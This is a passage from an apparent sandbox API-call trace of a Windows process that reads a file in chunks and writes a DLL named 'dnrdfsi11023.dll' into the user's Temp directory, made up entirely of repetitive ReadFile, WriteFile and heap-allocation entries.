lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.076] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.077] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.077] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.077] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.077] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.077] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.078] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x58225) returned 0x102a4ea0 [0119.078] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x103033a0 | out: hHeap=0x7e0000) returned 1 [0119.078] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.078] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.078] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.078] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.078] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.079] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.080] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.080] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.080] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.080] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.080] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.080] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.080] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.081] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.081] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.081] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.081] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.081] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.081] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x800, lpOverlapped=0x0) returned 1 [0119.081] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x233c) returned 0x1026c770 [0119.082] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xcaa1510 | out: hHeap=0x7e0000) returned 1 [0119.082] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x0, lpOverlapped=0x0) returned 1 [0119.082] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc95d848 | out: hHeap=0x7e0000) returned 1 [0119.082] CloseHandle (hObject=0xcb0) returned 1 [0119.082] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x6f73b0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0119.082] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x50) returned 0xca66320 [0119.082] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9adf90 [0119.082] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4) returned 0xc91bd50 [0119.082] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4) returned 0xc91be00 [0119.082] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9adc48 [0119.082] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x50) returned 0xca65c98 [0119.082] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0119.083] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x1) returned 0xc91bd90 [0119.083] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x2) returned 0xc91bdc0 [0119.083] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd90 | out: hHeap=0x7e0000) returned 1 [0119.083] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x3) returned 0xc91bc60 [0119.083] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bdc0 | out: hHeap=0x7e0000) returned 1 [0119.083] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4) returned 0xc91bc90 [0119.083] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc60 | out: hHeap=0x7e0000) returned 1 [0119.083] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6) returned 0xc91bd30 [0119.083] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc90 | out: hHeap=0x7e0000) returned 1 [0119.083] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x9) returned 0xca257c8 [0119.083] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd30 | out: hHeap=0x7e0000) returned 1 [0119.083] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xd) returned 0xca25798 [0119.083] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca257c8 | out: hHeap=0x7e0000) returned 1 [0119.084] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x13) returned 0xc792a70 [0119.084] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca25798 | out: hHeap=0x7e0000) returned 1 [0119.084] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x1c) returned 0xc6e47e8 [0119.084] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc792a70 | out: hHeap=0x7e0000) returned 1 [0119.084] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x2a) returned 0xc9ae000 [0119.084] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e47e8 | out: hHeap=0x7e0000) returned 1 [0119.084] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e47e8 [0119.084] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9ae1c0 [0119.084] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4928 [0119.084] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9ae1c0 | out: hHeap=0x7e0000) returned 1 [0119.084] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9ae000 | out: hHeap=0x7e0000) returned 1 [0119.084] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x47) returned 0xca3fc40 [0119.084] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9adc48 | out: hHeap=0x7e0000) returned 1 [0119.084] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x70) returned 0xc9679e0 [0119.084] AreFileApisANSI () returned 1 [0119.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca3fc40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0119.084] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6c) returned 0xc967c38 [0119.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca3fc40, cbMultiByte=-1, lpWideCharStr=0xc967c38, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dnrdfsi11023.dll") returned 54 [0119.084] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dnrdfsi11023.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dnrdfsi11023.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x6f6be0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcb0 [0119.085] GetFileType (hFile=0xcb0) returned 0x1 [0119.085] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc967c38 | out: hHeap=0x7e0000) returned 1 [0119.085] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x1000) returned 0xc95b838 [0119.085] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.086] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.087] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.087] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.087] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.088] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.088] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.088] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.089] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.089] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.089] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.090] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.090] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.090] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.090] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.091] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.091] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.091] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.092] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.092] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.092] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.093] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.093] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.093] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.094] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.094] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.094] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.095] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.095] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.095] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.096] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.096] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.096] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.097] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.097] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.097] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.098] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.098] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.098] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.099] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.099] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.099] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.100] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.103] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.103] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.103] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.104] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.104] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.104] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.105] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95b838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6f5134, lpOverlapped=0x0 | out: lpBuffer=0xc95b838*, lpNumberOfBytesWritten=0x6f5134*=0x1000, lpOverlapped=0x0) returned 1 [0119.105] WriteFile (in: hFile=0xcb0, 